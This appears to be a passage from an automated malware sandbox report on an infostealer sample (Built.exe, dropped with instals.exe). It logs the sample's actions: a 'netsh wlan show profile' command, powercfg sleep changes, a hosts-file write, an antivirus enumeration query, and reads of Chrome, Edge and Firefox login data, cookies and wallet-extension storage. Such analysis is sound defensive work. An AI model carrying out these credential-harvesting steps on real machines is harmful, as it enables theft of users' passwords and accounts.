                Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF62664D080
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626665EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF626665EEC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key, type: DROPPED
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
